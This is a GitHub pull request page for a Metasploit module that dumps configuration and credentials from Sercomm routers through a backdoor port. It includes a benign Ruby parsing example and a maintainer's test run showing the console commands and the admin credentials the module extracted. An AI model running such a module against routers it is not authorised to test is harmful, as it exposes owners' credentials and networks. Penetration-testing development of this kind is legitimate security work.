Fixed the credential parsing and made output consistent #2878

Merged
merged 2 commits into from Jan 16, 2014

3 participants

@mandreko
Contributor

So in the previous refactor, we made the dedicated method to parse
usernames and passwords from the split up config values. However, that
didn't work, because on a single iteration of the loop, you only have
access to a possible username OR password. The other matching key will
be another iteration of the loop. Because of this, no credential pairs
were being reported.

The only way I can see around this (maybe because I'm a Ruby newb) would
be to iterate over configs, and if the user or password regex matches,
add the matching value to a hash, which is identified by a key for both
user & pass. Then upon completion of the loop, it'd iterate over the
hash, finding keys that had both user & pass values.
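
The collect-then-pair approach described in the comment above, as an added Ruby example (not the module's code from this pull request). The key names, regexes and sample entries are constructed, and the config is assumed to be already split into `key=value` strings.

```ruby
# Added illustration; key names, patterns and sample data are constructed.
# Each service maps to the config keys that hold its user name and password.
CRED_KEYS = {
  'HTTP Web Management' => { user: /\Ahttp_username\z/, pass: /\Ahttp_password\z/ },
  'PPPoE'               => { user: /\Apppoe_username\z/, pass: /\Apppoe_password\z/ }
}.freeze

# Pass 1: visit each key=value entry once and file any match under its service.
# Pass 2: keep only the services for which both halves were seen.
def pair_credentials(configs)
  found = Hash.new { |h, k| h[k] = {} }
  configs.each do |entry|
    key, value = entry.split('=', 2)
    next if value.nil? || value.empty?
    CRED_KEYS.each do |service, patterns|
      patterns.each do |field, regex|
        found[service][field] = value if key =~ regex
      end
    end
  end
  found.select { |_, c| c.key?(:user) && c.key?(:pass) }
end

SAMPLE_CONFIG = [
  'wifi_ssid=EXAMPLE-SSID',
  'http_password=example-pass',   # password appears before its user name
  'pppoe_username=isp-user',      # no matching password: must not be reported
  'lan_ipaddr=192.0.2.1',
  'http_username=example-admin',
  'pppoe_password='               # empty value is ignored
].freeze

if __FILE__ == $PROGRAM_NAME
  pair_credentials(SAMPLE_CONFIG).each do |service, c|
    puts "#{service}: User: #{c[:user]} Pass: #{c[:pass]}"
  end
end
```

Because matches are stored per service and filtered only after the loop, the order of the entries does not matter and a lone user name or password is never reported as a pair.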

mandreko added some commits Jan 14, 2014
@mandreko mandreko Fixed the credential parsing and made output consistent
42fb8c4
@mandreko mandreko Added some additional creds that were useful 2d40f93
@jvazquez-r7
Contributor

Processing....

This was referenced Jan 14, 2014
@jvazquez-r7
Contributor

mandreko#3 tries to clean this pull request, see it for details, thanks!

@jvazquez-r7
Contributor

Hi @mandreko, we got a vulnerable device for testing, and I was able to check changes successfully :)

msf auxiliary(sercomm_dump_config) > show options

Module options (auxiliary/admin/misc/sercomm_dump_config):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  32764            yes       The target port

msf auxiliary(sercomm_dump_config) > set rhost 192.168.0.1
rhost => 192.168.0.1
msf auxiliary(sercomm_dump_config) > run

[*] 192.168.0.1:32764 - Attempting to connect and check endianess...
[+] 192.168.0.1:32764 - Big Endian device found...
[*] 192.168.0.1:32764 - Attempting to connect and dump configuration...
[*] 192.168.0.1:32764 - Router configuration dump stored in: /Users/juan/.msf4/loot/20140116072256_default_192.168.0.1_router.config_791024.txt
[*] 192.168.0.1:32764 - Wifi SSID: NETGEAR51
[*] 192.168.0.1:32764 - HTTP Web Management: User: admin Pass: password
[*] Auxiliary module execution completed

So if you don't mind, I'm going to land this pull request with my review included at the moment. If later you figure there is anything wrong with my changes, feel free to make a new pull request or just ping me and we can fix it! Landing! Thanks a lot for continuing to review it, you rock!

juan

@jvazquez-r7 jvazquez-r7 added a commit that referenced this pull request Jan 16, 2014
@jvazquez-r7 jvazquez-r7 Land #2878, @mandreko's fix for sercomm credentials parsing 2e6b1c7
@jvazquez-r7 jvazquez-r7 merged commit 2d40f93 into rapid7:master Jan 16, 2014

1 check passed

default The Travis CI build passed
@todb
Contributor
todb commented Jan 16, 2014

Oh great, I'm glad the device worked out!
